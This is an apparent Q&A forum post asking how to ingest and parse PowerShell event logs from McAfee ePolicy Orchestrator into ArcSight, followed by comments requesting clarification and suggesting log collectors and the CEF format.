1

I have read mixed reviews, our team within our DoD sector suggest that ingestion the logs directly into the SIEM platform would be best and I feel that having a third party tool with signatures, look at the event and determine if was malicious and then forward on an alert to the ESM for investigation.

The next issue we have is getting these events and sub-events parsed.

I have noticed that McAfee ePolicy Orchestrator sometimes alerts on powershell events but we can't seem to write a custom parser override or find the field that contains the full powershell command issues, only partial information on the command.

Any help would be much appreciated!

schroeder
  • 123,438
  • 55
  • 284
  • 319
md154199
  • 11
  • 1
  • This would appear to be a question for the vendor. – schroeder Feb 11 '19 at 16:07
  • Actually, I'm not sure what you are asking help with. ArcSight? Whether to pre-process events? EPO? Can you take another stab at this question? – schroeder Feb 11 '19 at 16:09
  • Take a look at log collection products on the market that can collect Powershell activity logs, parse these at the data source, then forwarded to Arcsight. Another item is if they can also parse in the CEF (Common Event Format) which is introduced by Arcsight. – NASAhorse Feb 12 '19 at 10:34

0 Answers0